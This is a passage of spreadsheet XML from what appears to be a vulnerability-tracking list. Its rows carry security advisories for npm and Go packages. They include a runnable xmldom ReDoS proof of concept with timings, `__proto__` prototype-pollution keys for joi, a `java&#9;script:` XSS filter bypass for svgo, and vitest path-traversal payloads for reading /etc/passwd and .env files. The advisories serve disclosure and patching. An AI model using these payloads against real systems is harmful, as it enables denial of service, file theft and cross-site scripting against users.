serialization path still emits `publicId`/`systemId` verbatim. `publicId` and `systemId` are not
validated at creation (`createDocumentType`) or on direct property assignment
(`documentType.publicId = …`) — the WHATWG DOM specification places no well-formedness constraint on
these fields at creation time, so the serializer is the spec-aligned enforcement point.</t></is></c><c r="T1628" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83618</t></is></c></row><row r="1629"><c r="A1629" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1629" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1629" s="5" t="inlineStr"><is><t>CVE-2026-83619</t></is></c><c r="D1629" s="5" t="inlineStr" /><c r="E1629" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1629" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1629" s="5" t="inlineStr" /><c r="H1629" s="5" t="n"><v>0.003</v></c><c r="I1629" s="5" t="inlineStr" /><c r="J1629" s="5" t="inlineStr" /><c r="K1629" s="5" t="inlineStr" /><c r="L1629" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M1629" s="5" t="inlineStr"><is><t>0.8.15</t></is></c><c r="N1629" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1629" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1629" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1629" s="5" t="inlineStr" /><c r="R1629" s="5" t="inlineStr" /><c r="S1629" s="5" t="inlineStr"><is><t>## Summary

On the `@xmldom/xmldom` **`0.8.x`** line, parsing an XML end tag whose name is followed by a long run
of whitespace and then a non-whitespace character triggers quadratic-time regular-expression
backtracking (ReDoS), so a single small crafted end tag stalls the Node.js event loop. It is reachable
from `DOMParser.parseFromString` under **default options**, unauthenticated, before any validity
check — an availability-only denial of service. The `0.9.x` line is **not** affected.

## Details

`lib/sax.js` (release-0.8.x, commit `e5c1480`) trims trailing whitespace from a captured end-tag name
with an unanchored global regex:

- `lib/sax.js` line 120: https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L120

```js
/[ \t\n\r]+$/g
```

Applied to a string shaped `whitespace-run + one non-whitespace char` (e.g. the content of an end tag
`&lt;/   …   x&gt;`), the engine must, for every starting position, extend `[ws]+` to the end and then fail
the `$` anchor when the trailing non-whitespace char is present — classic O(n²) backtracking in the
length of the whitespace run. The trimmed substring is delimited only by `indexOf('&gt;')`, so the
attacker controls its length directly.

## Proof of Concept

```js
const { DOMParser } = require('@xmldom/xmldom'); // 0.8.x
const n = 64 * 1024;
const payload = '&lt;r&gt;&lt;/' + ' '.repeat(n) + 'x&gt;';
console.time('parse');
new DOMParser().parseFromString(payload, 'text/xml');
console.timeEnd('parse');
```

Measured (Node 18) — time quadruples per doubling of the whitespace run (canonical O(n²)):

| Whitespace run | Isolated regex | End-to-end `parseFromString` (0.8.13) |
|---|---|---|
|  4 KB | 5.6 ms   | 5.7 ms   |
|  8 KB | 22.7 ms  | 22.5 ms  |
| 16 KB | 88.6 ms  | 92 ms    |
| 32 KB | 354 ms   | 361 ms   |
| 64 KB | 1434 ms  | 1452 ms  |
| 128 KB | 5761 ms | —        |

## Impact

Availability only: a single parse of a small crafted document blocks the Node.js event loop for the
duration of the quadratic scan (≈1.4 s at 64 KB; multi-second with larger inputs). No memory
blow-up, no data exposure, no integrity impact. Because XML is routinely accepted from untrusted
sources and parsed with default options, one request can stall a server.

## Affected Versions

Affected on the `0.7.x` and `0.8.x` lines (the trailing-whitespace trim was added in `0.7.0`, present
through `0.8.14`); the fix targets the `0.8.x` LTS patch. The `0.9.x` line rewrote end-tag parsing to
an anchored linear matcher and never had this regex, so it is **not** affected. No published unscoped
`xmldom` is affected — the vulnerable code exists only in a `0.7.0` git tag that was never released to
npm (`npm view xmldom` → `latest` = 0.6.0).

## Fix Applied

Anchors the end-tag trailing-whitespace trim so it runs in linear time instead of
backtracking quadratically on a long whitespace run. Byte-identical output. Non-breaking; 0.8.x-only.

## Severity note

The complexity is **quadratic**, not exponential, so a multi-second stall requires
tens-to-hundreds of KB of input. `VA:H` reflects that xmldom applies **no input-size limit** and the
path runs on default-options parsing, so a single unbounded parse can fully stall the event loop.</t></is></c><c r="T1629" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83619</t></is></c></row><row r="1630"><c r="A1630" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1630" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1630" s="5" t="inlineStr"><is><t>CVE-2026-84303</t></is></c><c r="D1630" s="5" t="inlineStr" /><c r="E1630" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1630" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1630" s="5" t="inlineStr" /><c r="H1630" s="5" t="n"><v>0.003</v></c><c r="I1630" s="5" t="inlineStr" /><c r="J1630" s="5" t="inlineStr" /><c r="K1630" s="5" t="inlineStr" /><c r="L1630" s="5" t="inlineStr"><is><t>Go:google.golang.org/grpc</t></is></c><c r="M1630" s="5" t="inlineStr"><is><t>1.83.1</t></is></c><c r="N1630" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1630" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1630" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1630" s="5" t="inlineStr" /><c r="R1630" s="5" t="inlineStr" /><c r="S1630" s="5" t="inlineStr"><is><t>### Summary
A vulnerability in the xDS RBAC HTTP filter implementation in grpc-go allows remote attackers to bypass authorization policies (specifically DENY rules) by using mixed-case or canonical-case header matchers (e.g., X-Role instead of x-role). Additionally, the safety guards introduced by gRFC A41 to block grpc- prefixed headers can be evaded via variations in casing (e.g., Grpc-Status).

### Impact
When an operator defines an RBAC policy referencing headers containing uppercase letters (e.g. X-Role), grpc-go fails to match incoming metadata keys because they are unconditionally lowercased. Because of this case-sensitivity mismatch, a policy designed to block requests containing specific header values fails open: the rule is evaluated as a non-match, and traffic that should have been rejected is served.

Furthermore, gRFC A41 requires rejecting configuration schemas specifying header matchers starting with grpc-. Because this check is executed case-sensitively in grpc-go, attackers can bypass the validation by specifying titles like Grpc-Status.

### Patches
The problem is fixed in `master` and in the 1.83.1 release.</t></is></c><c r="T1630" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84303</t></is></c></row><row r="1631"><c r="A1631" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1631" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1631" s="5" t="inlineStr"><is><t>CVE-2026-84363</t></is></c><c r="D1631" s="5" t="inlineStr" /><c r="E1631" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1631" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1631" s="5" t="inlineStr" /><c r="H1631" s="5" t="n"><v>0.003</v></c><c r="I1631" s="5" t="inlineStr" /><c r="J1631" s="5" t="inlineStr" /><c r="K1631" s="5" t="inlineStr" /><c r="L1631" s="5" t="inlineStr"><is><t>npm:hono</t></is></c><c r="M1631" s="5" t="inlineStr"><is><t>4.13.5</t></is></c><c r="N1631" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1631" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1631" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1631" s="5" t="inlineStr" /><c r="R1631" s="5" t="inlineStr" /><c r="S1631" s="5" t="inlineStr"><is><t>### Summary

Hono's query parsing does not stop at the URL fragment: a `?` appearing after a `#` is treated as the start of a query string. As a result, the application can read request parameters that no other component involved in handling the request can see.

### Details

A fragment is never part of the query, and every standard URL consumer — browsers, `new URL()`, reverse proxies — ignores everything from the first `#` onward. Hono's routing followed that rule; its query helpers did not.

For one and the same request, this produces an interpretation differential:

- A component in front of the application that inspects the query string — filtering rules, parameter allow/deny lists, access logging — observes no parameters, while the application reads and acts on them.
- The cache middleware removed the fragment when building its cache key, so a response influenced by parameters carried inside the fragment could be stored under a key that did not reflect them and later returned to other users.

The same divergence reaches request validation and any middleware that reads query parameters.

This requires a request target containing a literal `#` to reach the application. Deployments on runtimes that normalise such a target — including Cloudflare Workers — are not affected, and neither are those behind an intermediary that strips the fragment.

### Impact

An attacker can cause the application to act on parameters that components in front of it never observe.

This may lead to:

- filtering rules, allow/deny lists, and audit logging being blind to parameters the application still processes
- a cached response being stored under a key that does not reflect the parameters used to produce it, and served to other users
- stored cross-site scripting, where such a parameter is reflected into a cached HTML response without escaping

This issue affects applications that read query parameters and run on a runtime that passes a literal `#` through to the request URL.</t></is></c><c r="T1631" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84363</t></is></c></row><row r="1632"><c r="A1632" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1632" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1632" s="5" t="inlineStr"><is><t>CVE-2026-84364</t></is></c><c r="D1632" s="5" t="inlineStr" /><c r="E1632" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1632" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1632" s="5" t="inlineStr" /><c r="H1632" s="5" t="n"><v>0.004</v></c><c r="I1632" s="5" t="inlineStr" /><c r="J1632" s="5" t="inlineStr" /><c r="K1632" s="5" t="inlineStr" /><c r="L1632" s="5" t="inlineStr"><is><t>npm:hono</t></is></c><c r="M1632" s="5" t="inlineStr"><is><t>4.13.5</t></is></c><c r="N1632" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1632" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1632" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1632" s="5" t="inlineStr" /><c r="R1632" s="5" t="inlineStr" /><c r="S1632" s="5" t="inlineStr"><is><t>### Summary

When `parseBody()` expands dot-separated form field names into nested objects, it does not limit the nesting depth or the total number of objects created. A request body well within a normal size limit can therefore allocate an object graph far larger than the request itself, and concurrent requests can exhaust the heap and terminate the process.

### Details

Each dot-separated segment of a field name creates an intermediate object. Neither the segments within a single field name nor the total across a request was bounded, and empty segments were preserved, so a field name could encode one nesting level per byte.

Both shapes produce the effect: a single deeply dotted field name, and a large number of shallowly dotted ones within one body. A request body size limit does not prevent it, because the amplification happens after the body has been accepted.

Dot-notation parsing is not enabled by default.

### Impact

An attacker who can reach an endpoint that parses request bodies with dot-notation enabled can send concurrent requests whose memory cost is disproportionate to their size.

This may lead to:

- exhaustion of the JavaScript heap and termination of the server process
- the service remaining unavailable until it is restarted

This issue affects applications that explicitly enable dot-notation parsing. Applications using the default behaviour are not affected.</t></is></c><c r="T1632" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84364</t></is></c></row><row r="1633"><c r="A1633" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1633" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1633" s="5" t="inlineStr"><is><t>CVE-2026-84365</t></is></c><c r="D1633" s="5" t="inlineStr" /><c r="E1633" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1633" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1633" s="5" t="inlineStr" /><c r="H1633" s="5" t="n"><v>0.003</v></c><c r="I1633" s="5" t="inlineStr" /><c r="J1633" s="5" t="inlineStr" /><c r="K1633" s="5" t="inlineStr" /><c r="L1633" s="5" t="inlineStr"><is><t>npm:hono</t></is></c><c r="M1633" s="5" t="inlineStr"><is><t>4.13.5</t></is></c><c r="N1633" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1633" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1633" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1633" s="5" t="inlineStr" /><c r="R1633" s="5" t="inlineStr" /><c r="S1633" s="5" t="inlineStr"><is><t>### Summary

The fix released for CVE-2026-39408 does not cover every traversal sequence. `toSSG()` can still write files outside the configured output directory when a route parameter contains consecutive parent-directory segments.

### Details

Static site generation builds each output path from the route path and the values supplied through `ssgParams`, then verifies that the result stays inside the output directory. That check normalizes the path with the same routine that built it, and the routine did not fully collapse runs of consecutive parent-directory segments. A value carrying enough of them produces a path the check accepts, but the filesystem resolves outside the output directory.

The earlier fix handled a single parent-directory segment, so it blocks the sequence reported at the time while leaving longer runs unhandled. The check also treated output directories that differ only in how they are rooted as equivalent.

This arises when an application generates a static site from route parameter values it does not fully control — slugs coming from a CMS, an API, or user submissions.

### Impact

A value reaching `ssgParams` from an untrusted source can cause build output to be written outside the intended output directory, carrying whatever content the route handler produced.

This may lead to:

- files being created or overwritten elsewhere in the build environment
- generated artifacts or deployment output being altered

This affects build-time static site generation only; request-time routing is not affected. Applications whose `ssgParams` values are entirely developer-controlled are not affected.</t></is></c><c r="T1633" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84365</t></is></c></row><row r="1634"><c r="A1634" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1634" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1634" s="5" t="inlineStr"><is><t>CVE-2026-84367</t></is></c><c r="D1634" s="5" t="inlineStr" /><c r="E1634" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1634" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1634" s="5" t="inlineStr" /><c r="H1634" s="5" t="n"><v>0.003</v></c><c r="I1634" s="5" t="inlineStr" /><c r="J1634" s="5" t="inlineStr" /><c r="K1634" s="5" t="inlineStr" /><c r="L1634" s="5" t="inlineStr"><is><t>npm:joi</t></is></c><c r="M1634" s="5" t="inlineStr"><is><t>17.13.5, 18.2.4</t></is></c><c r="N1634" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1634" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1634" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1634" s="5" t="inlineStr" /><c r="R1634" s="5" t="inlineStr" /><c r="S1634" s="5" t="inlineStr"><is><t>### Impact

Applications are affected only if a schema renames keys with a regular-expression source and a `Joi.expression()` / `Joi.x()` target that interpolates the pattern's own match data, combined with `{ multiple: true }`, for example `.rename(/^x-(.+)$/, Joi.x('{#1}'), { multiple: true })`. Because the target is rendered from the matched input key, an attacker who controls input keys can send `x-__proto__` with an object value and make the rename target render as `__proto__`, which sets the prototype of the object joi returns instead of creating a key on it. The global `Object.prototype` is not modified, so the effect is confined to the object returned by that one `validate()` call.

Schemas using a static string rename target are not affected, and neither are schemas left on the default `{ multiple: false }`.

### Patches

Versions 17.13.5 and 18.2.4 have been released to address the issue.

### Workarounds

1. Replace the template rename target with a static string target.
2. Keep the template but make the capture unable to produce `__proto__`, using a negative lookahead: `.rename(/^x-(?!__proto__$)(.+)$/, Joi.x('{#1}'), { multiple: true })`
3. Drop { multiple: true } from the rename, which stops the rename before the assignment.</t></is></c><c r="T1634" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84367</t></is></c></row><row r="1635"><c r="A1635" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1635" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1635" s="5" t="inlineStr"><is><t>CVE-2026-84368</t></is></c><c r="D1635" s="5" t="inlineStr" /><c r="E1635" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1635" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1635" s="5" t="inlineStr" /><c r="H1635" s="5" t="n"><v>0.003</v></c><c r="I1635" s="5" t="inlineStr" /><c r="J1635" s="5" t="inlineStr" /><c r="K1635" s="5" t="inlineStr" /><c r="L1635" s="5" t="inlineStr"><is><t>npm:@hapi/joi, npm:joi</t></is></c><c r="M1635" s="5" t="inlineStr"><is><t>17.13.6, 18.2.5</t></is></c><c r="N1635" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1635" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1635" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1635" s="5" t="inlineStr" /><c r="R1635" s="5" t="inlineStr" /><c r="S1635" s="5" t="inlineStr"><is><t>### Impact
An application that passes attacker-controlled data into joi's custom message configuration (`messages()`, `message()`, `prefs({ messages })`, `Joi.extend({ messages })` or `rule({ message })`) lets the attacker write properties onto `Object.prototype`, where every object in the process then inherits them. A key named `__proto__` was treated as a language name, and the code reused the object it found at that key, which resolves to the prototype rather than to a new own property; a key named `constructor` did the same to the `Object` function's statics. A consuming application that gates on the mere presence of a property (`if (user.isAdmin)`) can be made to take the wrong branch for every object it inspects.

This is not reachable from data that joi validates. Custom messages are schema-construction configuration, normally written by the application developer. Exploitation therefore requires an application that feeds untrusted input straight into schema construction.

### Patches
Upgrade to version 18.2.5 or 17.13.6.

### Workarounds
Do not pass untrusted input into `messages()`, `message()`, `prefs({ messages })`, `Joi.extend({ messages })` or `rule({ message })`. Or validate that they don't contain any `__proto__` or `constructor` property.</t></is></c><c r="T1635" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84368</t></is></c></row><row r="1636"><c r="A1636" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1636" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1636" s="5" t="inlineStr"><is><t>CVE-2026-84369</t></is></c><c r="D1636" s="5" t="inlineStr" /><c r="E1636" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1636" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1636" s="5" t="inlineStr" /><c r="H1636" s="5" t="n"><v>0.003</v></c><c r="I1636" s="5" t="inlineStr" /><c r="J1636" s="5" t="inlineStr" /><c r="K1636" s="5" t="inlineStr" /><c r="L1636" s="5" t="inlineStr"><is><t>npm:svgo</t></is></c><c r="M1636" s="5" t="inlineStr"><is><t>2.8.4, 3.3.5, 4.1.0</t></is></c><c r="N1636" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1636" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1636" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1636" s="5" t="inlineStr" /><c r="R1636" s="5" t="inlineStr" /><c r="S1636" s="5" t="inlineStr"><is><t>## Summary

SVGO's opt-in `removeScripts` plugin did not inspect executable HTML content inside SVG `&lt;foreignObject&gt;` elements. Applications that used this plugin as their only protection for untrusted SVG input could produce SVGs containing active HTML and expose users to cross-site scripting (XSS).

SVGO is an optimizer rather than a comprehensive sanitization library, but `removeScripts` is maintained for consumers that already rely on it to remove common script execution paths.

## Details

Although the plugin removed SVG and XHTML `&lt;script&gt;` elements, it left other HTML execution paths inside `&lt;foreignObject&gt;` unchanged. These included:

- event-handler attributes such as `onload` and `onbeforetoggle`;
- `srcdoc` documents, including on `&lt;iframe&gt;` elements;
- executable URLs in HTML attributes such as `action`, `data`, `formaction`, `href`, and `src`.

An attacker could place one of these payloads in an SVG. If an application optimized the untrusted SVG with `removeScripts` and then served the result in an active browser context, the payload could execute in the viewer's origin.

## Impact

Successful exploitation could allow script execution in the context where the optimized SVG is rendered. Depending on the embedding and origin configuration, this could expose cookies or local storage, modify content, or perform actions as the victim.

The plugin is opt-in, so consumers that do not enable `removeScripts`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preserves visual HTML inside SVG `&lt;foreignObject&gt;` elements while removing event attributes, `srcdoc`, and executable URL values from active HTML URL attributes.

SVGO v1 is no longer maintained. Users of v1 should upgrade to a supported release line.

## Workarounds

For hostile input, use a dedicated SVG sanitization tool before passing the SVG to SVGO. As defense in depth, applications can reject or remove `&lt;foreignObject&gt;` content and avoid serving user-controlled SVGs in an active same-origin context.</t></is></c><c r="T1636" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84369</t></is></c></row><row r="1637"><c r="A1637" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1637" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1637" s="5" t="inlineStr"><is><t>CVE-2026-84370</t></is></c><c r="D1637" s="5" t="inlineStr" /><c r="E1637" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1637" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1637" s="5" t="inlineStr" /><c r="H1637" s="5" t="n"><v>0.003</v></c><c r="I1637" s="5" t="inlineStr" /><c r="J1637" s="5" t="inlineStr" /><c r="K1637" s="5" t="inlineStr" /><c r="L1637" s="5" t="inlineStr"><is><t>npm:svgo</t></is></c><c r="M1637" s="5" t="inlineStr"><is><t>2.8.4, 3.3.5, 4.1.0</t></is></c><c r="N1637" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1637" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1637" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1637" s="5" t="inlineStr" /><c r="R1637" s="5" t="inlineStr" /><c r="S1637" s="5" t="inlineStr"><is><t>## Summary

SVGO's opt-in `removeScripts` plugin failed to remove some executable links. Namespace-prefixed SVG anchors and URL schemes containing ASCII tabs or newlines could bypass its checks. Applications that used this plugin as their only protection for untrusted SVG input could expose users to cross-site scripting (XSS).

SVGO is an optimizer rather than a comprehensive sanitization library, but `removeScripts` is maintained for consumers that already rely on it to remove common script execution paths.

## Details

Two related bypasses were present:

1. The plugin inspected unprefixed SVG `&lt;a&gt;` elements but did not recognize namespace-prefixed SVG anchors such as `&lt;svg:a&gt;` when the prefix was bound to the SVG namespace. Their executable `href` or namespaced `*:href` values remained intact.
2. The URL check did not account for ASCII tab, line-feed, or carriage-return characters embedded in a scheme. Browsers remove these characters before parsing the scheme, so values such as `java&amp;#9;script:` could remain executable after bypassing the plugin's `javascript:` check.

Anchors in unrelated custom namespaces are not executable SVG anchors and remain untouched.

## Impact

If an application optimized attacker-controlled SVGs with `removeScripts` and then served the result in an active browser context, a victim could follow a link that executes script in the SVG's origin. Depending on the embedding and origin configuration, this could expose cookies or local storage, modify content, or perform actions as the victim.

The plugin is opt-in, so consumers that do not enable it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makes SVG anchor handling namespace-aware and strips ASCII tabs, line feeds, and carriage returns before checking executable URL schemes.

SVGO v1 is no longer maintained. Users of v1 should upgrade to a supported release line.

## Workarounds

For hostile input, use a dedicated SVG sanitization tool before passing the SVG to SVGO. Applications can also reject links from untrusted SVG input and avoid serving user-controlled SVGs in an active same-origin context.

## References

- v4 fix: https://github.com/svg/svgo/pull/2268
- related executable URL hardening: https://github.com/svg/svgo/pull/2263
- v3 backport: https://github.com/svg/svgo/pull/2269
- v2 backport: https://github.com/svg/svgo/pull/2272
- v4.1.0 release: https://github.com/svg/svgo/releases/tag/v4.1.0
- v3.3.5 release: https://github.com/svg/svgo/releases/tag/v3.3.5
- v2.8.4 release: https://github.com/svg/svgo/releases/tag/v2.8.4</t></is></c><c r="T1637" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84370</t></is></c></row><row r="1638"><c r="A1638" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1638" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1638" s="5" t="inlineStr"><is><t>CVE-2026-84373</t></is></c><c r="D1638" s="5" t="inlineStr" /><c r="E1638" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1638" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1638" s="5" t="inlineStr" /><c r="H1638" s="5" t="n"><v>0.004</v></c><c r="I1638" s="5" t="inlineStr" /><c r="J1638" s="5" t="inlineStr" /><c r="K1638" s="5" t="inlineStr" /><c r="L1638" s="5" t="inlineStr"><is><t>npm:@vitest/mocker, npm:vitest</t></is></c><c r="M1638" s="5" t="inlineStr"><is><t>4.1.11, 5.0.0-rc.2</t></is></c><c r="N1638" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1638" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1638" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1638" s="5" t="inlineStr" /><c r="R1638" s="5" t="inlineStr" /><c r="S1638" s="5" t="inlineStr"><is><t>## Summary
`@vitest/mocker` registers a redirect mock's target path without validating it
against the dev server's file-serving allowlist. An attacker who can reach the
dev server's WebSocket can register a redirect mock pointing outside the project
root; when the mocked module is requested, the plugin's `load` hook returns
`readFile(&lt;attacker path&gt;)` as the module source, disclosing local files.

This is exploitable **without authentication** only through the public
`mockerPlugin` / standalone `interceptorPlugin` exports (used by third-party dev
servers), which register the handler on Vite's unauthenticated HMR socket.
Vitest's own browser mode registers mocks over a **token-authenticated** RPC and
is not remotely reachable by default (see Scope).

## Affected code
`packages/mocker/src/node/interceptorPlugin.ts`.

The `load` hook is the file-read sink:

```ts
if (mock.type === 'redirect') {
  return readFile(mock.redirect, 'utf-8')
}
```

`mock.redirect` is derived from client input at registration time with no
boundary check:

```ts
if (event.type === 'redirect') {
  const redirectUrl = new URL(event.redirect)
  event.redirect = join(server.config.root, redirectUrl.pathname)
}
registry.register(event)
```

There is no `server.fs.allow` / `server.fs.deny` check and no assertion that the
resolved path stays within the project root.

## Registration paths and trust boundaries
- **Public `mockerPlugin` / `interceptorPlugin` (unauthenticated).** In
  `configureServer`, the plugin registers `server.ws.on('vitest:interceptor:register', …)`
  on Vite's HMR WebSocket. That socket performs no token, Origin, or same-origin
  check, so any client that can reach it can register a redirect mock. This is
  the path the "unauthenticated" impact applies to.
- **Vitest browser mode (authenticated).** Mocks register over the browser RPC
  (`registerMock`), which sits behind a per-run token (`isValidApiRequest`, a
  random `api.token`). The interceptor's `configureServer` socket is not used for
  registration here (in v5 it does not run at all, as the plugin is injected per
  environment). The same missing boundary check exists on the authenticated RPC
  path, but reaching it requires the token, so it is not a remote-unauthenticated
  read.

## Path handling
`new URL(redirect).pathname` combined with `join(root, pathname)` does **not**
confine reads to the root:

- Special/hierarchical schemes (`file:`, `http:`) are normalized by WHATWG URL,
  so `..` segments are collapsed and the result stays under the root. Payloads of
  the form `file:///../../etc/passwd` do **not** escape.
- A non-special (opaque) scheme preserves `..` in `pathname`, so
  `join(root, "../../…/etc/passwd")` resolves outside the root and reads an
  arbitrary file.

Even without escaping the root, the missing `server.fs` check allows reading any
in-root file the dev server would otherwise refuse to serve (for example an
in-root `.env` or source that is denied by `server.fs.deny`).

## Scope / preconditions
- This is a **development-server** issue. The dev server binds to `localhost` by
  default and is not reachable from the network unless the developer exposes it
  (`server.host` / `0.0.0.0`, a LAN bind, or a proxy).
- A raw (non-browser) client against a reachable server bypasses browser origin
  and CORS protections entirely and can both register the mock and read the
  response.
- A browser-based drive-by against a localhost server is substantially mitigated
  by Vite defaults: the default CORS origin allowlist is limited to `localhost`
  origins, and `server.allowedHosts` blocks DNS-rebinding, so a cross-origin page
  cannot read the file contents back.

## Impact
Disclosure of local files readable by the dev-server process (source, in-root
`.env`/secrets, and, via the opaque-scheme payload, files outside the project
root). No integrity or availability impact.

## Affected versions
Present since `@vitest/mocker` was introduced.

- **Affected: `@vitest/mocker` &gt;= 2.1.0** (shipped in `vitest` and
  `@vitest/browser` &gt;= 2.1.0), through 4.1.x and the 5.0.0 pre-releases.
- **Fixed:** Vitest 4.1.11 and 5.0.0. Older majors (2.1.x, 3.x) are not
  maintained and are not planned to receive the fix.

## Fix
Validate the resolved redirect target against Vite's file-serving allowlist
(`isFileLoadingAllowed`) before registering it, at every registration site, and
stop registering the interceptor WebSocket events in Vitest's browser mode
(mocks there flow through the authenticated RPC).</t></is></c><c r="T1638" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84373</t></is></c></row><row r="1639"><c r="A1639" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1639" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1639" s="5" t="inlineStr"><is><t>CVE-2026-84375</t></is></c><c r="D1639" s="5" t="inlineStr" /><c r="E1639" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1639" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1639" s="5" t="inlineStr" /><c r="H1639" s="5" t="n"><v>0.004</v></c><c r="I1639" s="5" t="inlineStr" /><c r="J1639" s="5" t="inlineStr" /><c r="K1639" s="5" t="inlineStr" /><c r="L1639" s="5" t="inlineStr"><is><t>npm:js-yaml</t></is></c><c r="M1639" s="5" t="inlineStr"><is><t>3.15.2, 4.3.2</t></is></c><c r="N1639" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1639" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1639" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1639" s="5" t="inlineStr" /><c r="R1639" s="5" t="inlineStr" /><c r="S1639" s="5" t="inlineStr"><is><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An attacker can submit a relatively small YAML document that causes prolonged CPU consumption despite the default `maxTotalMergeKeys` limit.

## Fix

Count each merge-source mapping as one budget unit, in addition to counting its keys.

## Difference with v5

